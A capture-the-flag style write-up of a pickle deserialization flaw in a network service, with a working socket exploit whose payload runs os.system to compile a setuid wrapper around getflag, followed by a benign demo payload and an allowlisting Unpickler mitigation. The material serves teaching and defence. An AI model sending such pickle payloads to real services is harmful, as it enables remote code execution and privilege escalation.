Initial reading reveals that the issue here is deserialization of untrusted input via pickle (even if you're not a pythonaut it does stand out in the code).
Going to the documentation, one immediately spots the following line:
Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Fair enough. A little bit of digging revealed this. Looks like the game is over. Let’s try that out:
import socket
# protocol-0 pickle opcodes: GLOBAL os.system, MARK, STRING, TUPLE, REDUCE, STOP
egg = "cos\nsystem\n(S'gcc /tmp/wrap.c -o /tmp/wrap && chmod +s /tmp/wrap'\ntR."
s = socket.socket()
host = "192.168.1.18"
port = 10007
s.connect((host, port))
s.send(egg)  # the service unpickles whatever it receives, so os.system() runs on the target
wrap.c is just a C wrapper around a system("/bin/getflag") call, compiled on the target and made setuid by the command inside the egg. Also, instead of using a Python script, you can simply send the egg string to the service yourself. Continuing:
You have successfully executed getflag on a target account
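To make the pickle primitive used above concrete, here is an added example (not code from the original writeup): it hand-assembles the same opcode stream with a harmless command in place of the gcc/chmod one, shows what the target does when it calls pickle.loads() on it, and puts beside it the allowlisting Unpickler that the pickle documentation recommends. The command strings, the BENIGN object and the ALLOWED set are assumptions chosen for illustration.

```python
import io
import pickle
import pickletools

# Constructed payload in the same shape as the writeup's egg (GLOBAL os.system,
# MARK, STRING, TUPLE, REDUCE, STOP), with a harmless command instead of the
# gcc/chmod one so that running this file changes nothing on disk.
EGG = b"cos\nsystem\n(S'echo pwned'\ntR."

# Constructed benign message, the kind of object a service legitimately exchanges.
BENIGN = pickle.dumps({"level": 7})


def build_egg(command):
    """Hand-assemble the protocol-0 stream that makes pickle call os.system(command).

    c<module>\\n<name>\\n  GLOBAL  push os.system onto the stack
    (                     MARK
    S'<str>'\\n            STRING  push the argument
    t                     TUPLE   pack everything since MARK into (command,)
    R                     REDUCE  call os.system(*args)
    .                     STOP
    """
    return b"cos\nsystem\n(S'" + command.encode() + b"'\ntR."


def opcodes(egg):
    """Opcode names in the stream, the same view `python -m pickletools` gives."""
    return [op.name for op, _arg, _pos in pickletools.genops(egg)]


def handle_vulnerable(data):
    """What the target does: unpickle whatever arrived on the socket."""
    return pickle.loads(data)  # os.system(command) runs here; its exit status is the result


class RestrictedUnpickler(pickle.Unpickler):
    """Only resolve globals on an allowlist (the mitigation shown in the pickle docs).

    The allowlist is an assumption for this example; a real service lists the
    exact types it actually exchanges, and nothing that can execute code.
    """

    ALLOWED = {("builtins", "set"), ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("forbidden global %s.%s" % (module, name))


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def handle_hardened(data):
    """Drop-in replacement for handle_vulnerable: ('ok', obj) or ('rejected', reason)."""
    try:
        return ("ok", safe_loads(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    print(opcodes(EGG))
    print(handle_hardened(EGG))
    print(handle_hardened(BENIGN))
```

The hardened handler rejects the egg at the GLOBAL opcode, before REDUCE ever runs, while still loading BENIGN. Allowlisting only narrows the damage, though: if any allowed callable can do something useful for an attacker, REDUCE will still call it, so the real fix is to not unpickle network input at all (use JSON or another data-only format) or to authenticate the bytes with an HMAC before they reach pickle.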